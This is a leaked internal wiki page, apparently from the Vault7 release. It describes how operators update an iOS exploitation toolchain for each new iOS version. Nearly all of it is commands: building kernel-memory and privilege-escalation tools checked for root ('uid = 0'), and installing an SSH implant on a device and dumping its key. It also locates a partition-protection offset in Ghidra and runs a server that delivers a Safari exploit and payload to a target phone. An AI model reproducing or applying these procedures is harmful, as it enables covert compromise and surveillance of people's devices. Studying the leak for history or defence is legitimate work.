Vault7: CIA Hacking Tools Revealed
 
Navigation: » Latest version
iOS Triage Process
This describes the process needing to been done when a new iOS version is released.
Pre Setup
- Make a directory store output folders- mkdir OUT
- set $OUT- export OUT=<PWD>/OUT (PWD = mac command for present working directory)
 
 
- Grab the entire ios_manifest- mkdir iOS and change into it
- repo init -u ssh://git@stash.devlan.net:7999/ios/ios_manifest
- repo sync
- set $IOS_REPO- export IOS_REPO=<PATH>/ios_repo 
 
 
- Grab a testdylib for testing- get testdylib_manifest- repo init -u ssh://git@stash.devlan.net:7999/ios/testdylib_manifest
- repo sync
 
- cd into testdylib_repo/testdylib
- make
- set $TEST_DYLIB- export TEST_DYLIB=<PWD>/testdylib_repo/Build/Release-iPhoneOS/testdylib/testmain 
 
 
- get testdylib_manifest
- 
Make sure ghidra_dir installed - must be at least version 6 
- in your ghidra install look for a folder that contains "ghidraRun" 
- set $GH_PATH to the path specified above
- export GH_PATH=<path>- use full not relative path
 
 
List of tools now needed
- Xcode Developer Disk Image (DMG)- Install Xcode (get the lastest released)- find DMG in xcode directory (/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport/<current version>/DeveloperDiskImage.dmg)) 
 
- find DMG in xcode directory 
- put with the other DMG's ( redux/res/dmg )
 
- Install Xcode (get the lastest released)
Saline
- cd $IOS_REPO/saline
- make clean
- make
- run saline- $IOS_REPO//Dist/Release-MacOSX/saline $TEST_DYLIB
 
Adderall
- cd into $IOS_REPO/nightversion/python/nv_kern_read_command.py - update kern start
- in get_ios_type, verify correct version number is in there
 
- update make files in $IOS_REPO/early-make by adding new prefix to new to the lists- early-bokken
- early-close
- early-persist
- early-remote
 
- update rana- update match function in $IOS_REPO/rana/ranas/<proper>_rana.py
- <proper> is most likely saline
 
- cd $IOS_REPO/adderall
- make clean
- make
- under $OUT make a folder for adderall files- mkdir $OUT/adder_files
- we will call it $AD_OUT
- export AD_OUT="$OUT/adder_files"
 
- cd $IOS_REPO/Dist/Release-MacOSX/
- ./adderall-dist $AD_OUT
- Hopefully have execution
- If theses are beta version then copy the folder in your $AD_OUT to: /Volumes/share/MDB/iOS/iOSFiles-Beta/
- If theses are not beta version then copy the folder in your $AD_OUT to: /Volumes/share/MDB/iOS/iOSFiles/
Symdra / Elsym
- under $OUT make a folder for adderall files- mkdir $OUT/sym_files
- we will call it $SYM_OUT
- export SYM_OUT="$OUT/sym_files"
 
- create branch for elsym-dist- cd $IOS_REPO/elsym-dist/ 
- git checkout -b <descriptive_name> 
 
- 
cd back to $IOS_REPO - cd $IOS_REPO 
 
- run symdra from the $IOS_REPO directory- python symdra/ full -k $AD_OUT -a $SYM_OUT -g $GH_PATH -b <build_number_for_device>- ex. "-b 13A4325c"
 
- (YES you are running python on a folder)
 
- python symdra/ full -k $AD_OUT -a $SYM_OUT -g $GH_PATH -b <build_number_for_device>
- When done symbol.db in $SYM_OUT- ls $SYM_OUT/*/symbol.db
 
- This will be feed into Elsym
- Check that the symbol.db is good- sqlite3 $SYM_OUT/<IPSW>/symbol.db
- select * from [ Master_Symbols ];
- .exit
 
- verify elsym- cd $IOS_REPO/elsym
- git checkout -b <descriptive_name>
- el.py- make sure build number is in the list
- might need to change "EL_CONFIG_LWVM_PARITION_FLAG_OFFSET"- For iOS 8.4 we had to change it to 0x28. To determine:- Open ghidra
- File -> Open Project
- goto the symdra_results/<IPSW>/Ghidra/kernelcache.gpr
- Open the System.kext and search for the string "disk0s1", "disk0s1s1", "Writable", and/or "UUID"
- This function is bsd_init (note this is heavily inlined and may not fully decompile)
- Find the call to _VNOP_IOCTL
- The second parameter is the ioctl number we need (in the past was 0xc01064c2 but might be broken into two instructions)
- Note the ioctl number
- Open com.apple.driver.LightweightVolumeManager.kext
- Search Program Text for the ioctl number (note you may want to search for half of it at a time) being used in a comparison
- This function is the ioctl handler
- Inside the true block of the conditional, look for the constants on the ioctl
- One of the commands sets a read-only field (1), the offset for this field is the LWVM_PARTION_FLAG_OFFSET.
 
 
- For iOS 8.4 we had to change it to 0x28. To determine:
 
- run and see what happen- 
ZOO_IPSW_PATH=$SYM_OUT make copyonedist ZOO_TARGET=<IPSW>- ex. ZOO_IPSW_PATH=$SYM_OUT make copyonedist ZOO_TARGET=iPad4,1_9.0_13A341
- _kernel_memory_allocate is only used for the development
 
 
- 
ZOO_IPSW_PATH=$SYM_OUT make copyonedist ZOO_TARGET=<IPSW>
- python verify.py $IOS_REPO/elsym-dist/
- python print_config.py $IOS_REPO/elsym-dist/el_<IPSW>.plist
 
- (folder: elsym) If changes to elsym were made put up for pull request
- (folder: elsym-dist) For new el_*.plist put up for up requests
Nightvision
- under $OUT make a folder for nightvision files- mkdir $OUT/nv_files
- we will call it $NV_OUT
- export NV_OUT="$OUT/nv_files"
 
- cd $IOS_REPO/nightvision 
- make clean
- make dist
- $IOS_REPO/Dist/Release-iPhoneOS/nv -c $IOS_REPO/elsym-dist/ get -o $NV_OUT/
- 
tar -tvf $NV_OUT/<IPSW>..tbz | grep "/private/var/root" - You should see files in the list 
 
El_util
- cd $IOS_REPO/elutil
- make clean
- make ZOO_IPSW="<target>"- ex. make ZOO_IPSWS=iPhone6,1_13A341
 
- el_runo.sh don't use even if it is in the directory
- cd $IOS_REPO/rana
- make
- 
python /Users/User #77254/g/TriageUpdate/ios_repo/Build/Release-MacOSX/rana.pyz -a execute /Users/User #77254/g/TriageUpdate/ios_repo/Build/Release-iPhoneOS/elutil/iPhone6,1_13A341/el_priv - should be "uid = 0, euid = 0"
 
--REWRITE End--
El_unit
- cd $IOS_REPO/elunit
- ZOO_ISPW_PATH=$SYM_OUT make- need a device on the developer profile
 
- should only have 1 failed test
El_ssh
- go into el_ssh
- 
ZOO_IPSWS="<target>" EL_SSH_ACCESS="close" ZOO_ISPW_PATH=<outdir> make - If you get the following error 
- el_ssh/Makefile:46: *** No ipsw resources for <target> . Stop. 
- copy the plist from your elsym-dist from the symdra test into the elsym-dist in your manifest
 
- ../Dist/Release-iPhoneOS/el_ssh install
- ../Dist/Release-iPhoneOS/el_ssh run
- ../Dist/Release-iPhoneOS/el_ssh dumpkey ssh.key
- ../Dist/Release-iPhoneOS/el_ssh relay -p 2222
- ssh -i ssh.key -p 2222 root@localhost
- ls bin_nohash
Remote
- under testdylib manifest
- in testdylib make dist
- under mcnugget manifest
- cd mcnugget
- make
- cd mcp_archon
- archon.py- variable = iOS
 
- earth.py- variable = iOS
 
- soul.py- (doesn't actually check version) we are good
 
- safari - settings advance Web Inspector on- Settings -> Advanced -> Web Inspector
 
- settings developer enable UIUser Interface automation
 
- settings advance Web Inspector on
- ZOO_IPSW_PATH=~/temp/ ZOO_CONFIG=Release make delivery
- cd ../Build/Release-MacOSX/mcnugget/
- 
./mc_creator plist --url http://<ip>:8080 --server-port 8080 -t myid mc.plist --console --passphrase "" - <ip> is the ip of your Mac ( not your iDevice) 
- OR if your feel like cheating ./mc_creator plist --url http://`ifconfig | grep "inet 10" | cut -d " " -f 2`:8080 --server-port 8080 -t myid mc.plist --console --passphrase ""
 
- ./solcreate mc.plist /<path>/testdylib.zip -t myid -o myid.sol --nonpersist 
- ./mc_creator server mctest mc.plist mcplugins/mcp_* myid.sol 
- 
./mctest - press enter when prompted for passphrase 
- wait for ENGINE Bus STARTED
 
- Make sure device is on wifi
- Connect device via usb - then run python mdf syslog
 
- verify safari is not loaded in memory on target
- On device open safari - then browse to http://<ip>:8080/?id=myid
 
- On mctest log you should see- "exploitation succeeded, deleting from target dictionary" 
 
- 
In the syslog you should see the - "iPhone locationd[57] <Emergency>: ==== Testdylib Started at:"
 
Persistence
Test of vulnerability
- install el_ssh
- git the grist_manifest
- init repo
- goto into the dyld-js folder in the repo
- make dylinker_test ZOO_CONFIG=Debug 
- ~/git2/el_ssh_manifest/Dist/Release-iPhoneOS/scp -i <key file> ../Build/Debug-iPhoneOS/dyld-js/dylinker_test_<arch>.js root@<device ip>: 
- ssh -i <key file> root@<device ip> 
- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc dylinker_test_64.js 
- You should see [dylinker] 5 of 5 passed.
Related articles
iOS Firmware Updating to latest procedure / Adding Exploit Support For New Devices
('contentbylabel' missing)
('details' missing)